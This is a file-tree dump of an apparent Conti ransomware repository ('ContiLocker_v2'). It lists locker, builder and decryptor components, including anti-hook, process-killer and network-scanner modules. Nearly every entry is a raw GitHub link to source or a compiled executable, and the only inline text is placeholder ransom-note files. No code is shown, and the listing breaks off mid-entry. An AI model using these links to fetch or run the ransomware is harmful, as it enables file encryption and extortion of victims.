├── .gitignore ├── ContiLocker_v2.sln ├── Debug ├── R3ADM3.txt ├── builder.exe ├── builder.ilk ├── builder.pdb ├── decryptor.exe ├── decryptor.ilk ├── decryptor.pdb ├── locker.exe ├── locker.ilk └── locker.pdb ├── README.md ├── Release ├── R3ADM3.txt ├── builder.exe ├── builder.iobj ├── builder.ipdb ├── builder.pdb ├── builder.rar ├── decryptor.exe ├── decryptor.iobj ├── decryptor.ipdb ├── decryptor.pdb ├── locker — копия.exe ├── locker.exe ├── locker.iobj ├── locker.ipdb └── test.zip ├── decryptor ├── Debug │ ├── R3ADM3.txt │ ├── chacha.obj │ ├── decryptor.Build.CppClean.log │ ├── decryptor.log │ ├── decryptor.obj │ ├── decryptor.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── decryptor.lastbuildstate │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── decryptor.vcxproj.FileListAbsolute.txt │ ├── disks.obj │ ├── global_parameters.obj │ ├── main.obj │ ├── memory.obj │ ├── network_scanner.obj │ ├── search.obj │ ├── threadpool.obj │ ├── vc142.idb │ └── vc142.pdb ├── MetaRandom2.h ├── MetaString.h ├── R3ADM3.txt ├── Release │ ├── R3ADM3.txt │ ├── chacha.obj │ ├── decryptor.Build.CppClean.log │ ├── decryptor.log │ ├── decryptor.obj │ ├── decryptor.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── decryptor.lastbuildstate │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── decryptor.vcxproj.FileListAbsolute.txt │ ├── disks.obj │ ├── global_parameters.obj │ ├── main.obj │ ├── memory.obj │ ├── network_scanner.obj │ ├── search.obj │ ├── threadpool.obj │ └── vc140.pdb ├── chacha20 │ ├── CONTI.txt │ ├── R3ADM3.txt │ ├── chacha.c │ ├── chacha.h │ ├── ecrypt-config.h │ ├── ecrypt-machine.h │ ├── ecrypt-portable.h │ └── ecrypt-sync.h ├── common.h ├── decryptor.cpp ├── decryptor.h ├── decryptor.vcxproj ├── decryptor.vcxproj.filters ├── decryptor.vcxproj.user ├── disks.cpp ├── filesystem.h ├── global_parameters.cpp ├── global_parameters.h ├── main.cpp ├── memory.cpp ├── memory.h ├── network_scanner.cpp ├── network_scanner.h ├── queue.h ├── search.cpp ├── threadpool.cpp └── threadpool.h └── locker ├── Debug ├── R3ADM3.txt ├── antihooks.obj ├── api.obj ├── chacha.obj ├── disks.obj ├── global_parameters.obj ├── hash.obj ├── locker.Build.CppClean.log ├── locker.log ├── locker.obj ├── locker.tlog │ ├── CL.command.1.tlog │ ├── CL.read.1.tlog │ ├── CL.write.1.tlog │ ├── link.command.1.tlog │ ├── link.read.1.tlog │ ├── link.write.1.tlog │ └── locker.lastbuildstate ├── locker.vcxproj.FileListAbsolute.txt ├── logs.obj ├── main.obj ├── memory.obj ├── network_scanner.obj ├── process_killer.obj ├── search.obj ├── threadpool.obj ├── vc142.idb └── vc142.pdb ├── GetApi.h ├── MetaRandom2.h ├── MetaString.h ├── R3ADM3.txt ├── Release ├── R3ADM3.txt ├── antihooks.obj ├── api.obj ├── chacha.obj ├── disks.obj ├── global_parameters.obj ├── hash.obj ├── locker.Build.CppClean.log ├── locker.log ├── locker.obj ├── locker.tlog │ ├── CL.command.1.tlog │ ├── CL.read.1.tlog │ ├── CL.write.1.tlog │ ├── link.command.1.tlog │ ├── link.read.1.tlog │ ├── link.write.1.tlog │ └── locker.lastbuildstate ├── locker.vcxproj.FileListAbsolute.txt ├── logs.obj ├── main.obj ├── memory.obj ├── network_scanner.obj ├── process_killer.obj ├── search.obj ├── threadpool.obj └── vc140.pdb ├── antihook ├── CONTI.txt ├── antihooks.cpp └── antihooks.h ├── api.cpp ├── api.h ├── chacha20 ├── CONTI.txt ├── R3ADM3.txt ├── chacha.c ├── chacha.h ├── ecrypt-config.h ├── ecrypt-machine.h ├── ecrypt-portable.h └── ecrypt-sync.h ├── common.h ├── disks.cpp ├── filesystem.h ├── global_parameters.cpp ├── global_parameters.h ├── hash.cpp ├── hash.h ├── locker.cpp ├── locker.h ├── locker.vcxproj ├── locker.vcxproj.filters ├── locker.vcxproj.user ├── logs.cpp ├── logs.h ├── main.cpp ├── memory.cpp ├── memory.h ├── network_scanner.cpp ├── network_scanner.h ├── ntdll.h ├── process_killer.cpp ├── process_killer.h ├── queue.h ├── search.cpp ├── threadpool.cpp └── threadpool.h /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/.gitignore -------------------------------------------------------------------------------- /ContiLocker_v2.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/ContiLocker_v2.sln -------------------------------------------------------------------------------- /Debug/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /Debug/builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/builder.exe -------------------------------------------------------------------------------- /Debug/builder.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/builder.ilk -------------------------------------------------------------------------------- /Debug/builder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/builder.pdb -------------------------------------------------------------------------------- /Debug/decryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/decryptor.exe -------------------------------------------------------------------------------- /Debug/decryptor.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/decryptor.ilk -------------------------------------------------------------------------------- /Debug/decryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/decryptor.pdb -------------------------------------------------------------------------------- /Debug/locker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/locker.exe -------------------------------------------------------------------------------- /Debug/locker.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/locker.ilk -------------------------------------------------------------------------------- /Debug/locker.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Debug/locker.pdb -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/README.md -------------------------------------------------------------------------------- /Release/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /Release/builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/builder.exe -------------------------------------------------------------------------------- /Release/builder.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/builder.iobj -------------------------------------------------------------------------------- /Release/builder.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/builder.ipdb -------------------------------------------------------------------------------- /Release/builder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/builder.pdb -------------------------------------------------------------------------------- /Release/builder.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/builder.rar -------------------------------------------------------------------------------- /Release/decryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/decryptor.exe -------------------------------------------------------------------------------- /Release/decryptor.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/decryptor.iobj -------------------------------------------------------------------------------- /Release/decryptor.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/decryptor.ipdb -------------------------------------------------------------------------------- /Release/decryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/decryptor.pdb -------------------------------------------------------------------------------- /Release/locker — копия.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/locker — копия.exe -------------------------------------------------------------------------------- /Release/locker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/locker.exe -------------------------------------------------------------------------------- /Release/locker.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/locker.iobj -------------------------------------------------------------------------------- /Release/locker.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/locker.ipdb -------------------------------------------------------------------------------- /Release/test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/Release/test.zip -------------------------------------------------------------------------------- /decryptor/Debug/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /decryptor/Debug/chacha.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/chacha.obj -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.Build.CppClean.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.Build.CppClean.log -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.log -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.obj -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.tlog/decryptor.lastbuildstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.tlog/decryptor.lastbuildstate -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/decryptor.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /decryptor/Debug/decryptor.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /decryptor/Debug/disks.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/disks.obj -------------------------------------------------------------------------------- /decryptor/Debug/global_parameters.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/global_parameters.obj -------------------------------------------------------------------------------- /decryptor/Debug/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/main.obj -------------------------------------------------------------------------------- /decryptor/Debug/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/memory.obj -------------------------------------------------------------------------------- /decryptor/Debug/network_scanner.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/network_scanner.obj -------------------------------------------------------------------------------- /decryptor/Debug/search.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/search.obj -------------------------------------------------------------------------------- /decryptor/Debug/threadpool.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/threadpool.obj -------------------------------------------------------------------------------- /decryptor/Debug/vc142.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/vc142.idb -------------------------------------------------------------------------------- /decryptor/Debug/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Debug/vc142.pdb -------------------------------------------------------------------------------- /decryptor/MetaRandom2.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/MetaRandom2.h -------------------------------------------------------------------------------- /decryptor/MetaString.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/MetaString.h -------------------------------------------------------------------------------- /decryptor/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /decryptor/Release/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /decryptor/Release/chacha.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/chacha.obj -------------------------------------------------------------------------------- /decryptor/Release/decryptor.Build.CppClean.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.Build.CppClean.log -------------------------------------------------------------------------------- /decryptor/Release/decryptor.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.log -------------------------------------------------------------------------------- /decryptor/Release/decryptor.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.obj -------------------------------------------------------------------------------- /decryptor/Release/decryptor.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /decryptor/Release/decryptor.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /decryptor/Release/decryptor.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /decryptor/Release/decryptor.tlog/decryptor.lastbuildstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.tlog/decryptor.lastbuildstate -------------------------------------------------------------------------------- /decryptor/Release/decryptor.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /decryptor/Release/decryptor.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /decryptor/Release/decryptor.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/decryptor.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /decryptor/Release/decryptor.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /decryptor/Release/disks.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/disks.obj -------------------------------------------------------------------------------- /decryptor/Release/global_parameters.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/global_parameters.obj -------------------------------------------------------------------------------- /decryptor/Release/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/main.obj -------------------------------------------------------------------------------- /decryptor/Release/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/memory.obj -------------------------------------------------------------------------------- /decryptor/Release/network_scanner.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/network_scanner.obj -------------------------------------------------------------------------------- /decryptor/Release/search.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/search.obj -------------------------------------------------------------------------------- /decryptor/Release/threadpool.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/threadpool.obj -------------------------------------------------------------------------------- /decryptor/Release/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/Release/vc140.pdb -------------------------------------------------------------------------------- /decryptor/chacha20/CONTI.txt: -------------------------------------------------------------------------------- 1 | TEST -------------------------------------------------------------------------------- /decryptor/chacha20/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /decryptor/chacha20/chacha.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/chacha20/chacha.c -------------------------------------------------------------------------------- /decryptor/chacha20/chacha.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/chacha20/chacha.h -------------------------------------------------------------------------------- /decryptor/chacha20/ecrypt-config.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/chacha20/ecrypt-config.h -------------------------------------------------------------------------------- /decryptor/chacha20/ecrypt-machine.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/chacha20/ecrypt-machine.h -------------------------------------------------------------------------------- /decryptor/chacha20/ecrypt-portable.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/chacha20/ecrypt-portable.h -------------------------------------------------------------------------------- /decryptor/chacha20/ecrypt-sync.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/chacha20/ecrypt-sync.h -------------------------------------------------------------------------------- /decryptor/common.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/common.h -------------------------------------------------------------------------------- /decryptor/decryptor.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/decryptor.cpp -------------------------------------------------------------------------------- /decryptor/decryptor.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/decryptor.h -------------------------------------------------------------------------------- /decryptor/decryptor.vcxproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/decryptor.vcxproj -------------------------------------------------------------------------------- /decryptor/decryptor.vcxproj.filters: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/decryptor.vcxproj.filters -------------------------------------------------------------------------------- /decryptor/decryptor.vcxproj.user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/decryptor.vcxproj.user -------------------------------------------------------------------------------- /decryptor/disks.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/disks.cpp -------------------------------------------------------------------------------- /decryptor/filesystem.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/filesystem.h -------------------------------------------------------------------------------- /decryptor/global_parameters.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/global_parameters.cpp -------------------------------------------------------------------------------- /decryptor/global_parameters.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/global_parameters.h -------------------------------------------------------------------------------- /decryptor/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/main.cpp -------------------------------------------------------------------------------- /decryptor/memory.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/memory.cpp -------------------------------------------------------------------------------- /decryptor/memory.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/memory.h -------------------------------------------------------------------------------- /decryptor/network_scanner.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/network_scanner.cpp -------------------------------------------------------------------------------- /decryptor/network_scanner.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/network_scanner.h -------------------------------------------------------------------------------- /decryptor/queue.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/queue.h -------------------------------------------------------------------------------- /decryptor/search.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/search.cpp -------------------------------------------------------------------------------- /decryptor/threadpool.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/threadpool.cpp -------------------------------------------------------------------------------- /decryptor/threadpool.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/decryptor/threadpool.h -------------------------------------------------------------------------------- /locker/Debug/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /locker/Debug/antihooks.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/antihooks.obj -------------------------------------------------------------------------------- /locker/Debug/api.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/api.obj -------------------------------------------------------------------------------- /locker/Debug/chacha.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/chacha.obj -------------------------------------------------------------------------------- /locker/Debug/disks.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/disks.obj -------------------------------------------------------------------------------- /locker/Debug/global_parameters.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/global_parameters.obj -------------------------------------------------------------------------------- /locker/Debug/hash.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/hash.obj -------------------------------------------------------------------------------- /locker/Debug/locker.Build.CppClean.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.Build.CppClean.log -------------------------------------------------------------------------------- /locker/Debug/locker.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.log -------------------------------------------------------------------------------- /locker/Debug/locker.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.obj -------------------------------------------------------------------------------- /locker/Debug/locker.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /locker/Debug/locker.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /locker/Debug/locker.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /locker/Debug/locker.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /locker/Debug/locker.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /locker/Debug/locker.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /locker/Debug/locker.tlog/locker.lastbuildstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/locker.tlog/locker.lastbuildstate -------------------------------------------------------------------------------- /locker/Debug/locker.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /locker/Debug/logs.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/logs.obj -------------------------------------------------------------------------------- /locker/Debug/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/main.obj -------------------------------------------------------------------------------- /locker/Debug/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/memory.obj -------------------------------------------------------------------------------- /locker/Debug/network_scanner.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/network_scanner.obj -------------------------------------------------------------------------------- /locker/Debug/process_killer.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/process_killer.obj -------------------------------------------------------------------------------- /locker/Debug/search.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/search.obj -------------------------------------------------------------------------------- /locker/Debug/threadpool.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/threadpool.obj -------------------------------------------------------------------------------- /locker/Debug/vc142.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/vc142.idb -------------------------------------------------------------------------------- /locker/Debug/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Debug/vc142.pdb -------------------------------------------------------------------------------- /locker/GetApi.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/GetApi.h -------------------------------------------------------------------------------- /locker/MetaRandom2.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/MetaRandom2.h -------------------------------------------------------------------------------- /locker/MetaString.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/MetaString.h -------------------------------------------------------------------------------- /locker/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /locker/Release/R3ADM3.txt: -------------------------------------------------------------------------------- 1 | __DECRYPT_NOTE__ -------------------------------------------------------------------------------- /locker/Release/antihooks.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/antihooks.obj -------------------------------------------------------------------------------- /locker/Release/api.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/api.obj -------------------------------------------------------------------------------- /locker/Release/chacha.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/chacha.obj -------------------------------------------------------------------------------- /locker/Release/disks.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/disks.obj -------------------------------------------------------------------------------- /locker/Release/global_parameters.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/global_parameters.obj -------------------------------------------------------------------------------- /locker/Release/hash.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/hash.obj -------------------------------------------------------------------------------- /locker/Release/locker.Build.CppClean.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.Build.CppClean.log -------------------------------------------------------------------------------- /locker/Release/locker.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.log -------------------------------------------------------------------------------- /locker/Release/locker.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxamin/conti_locker/HEAD/locker/Release/locker.obj -------------------------------------------------------------------------------- /locker/Release/locker.tlog/CL.command.1.tlog: 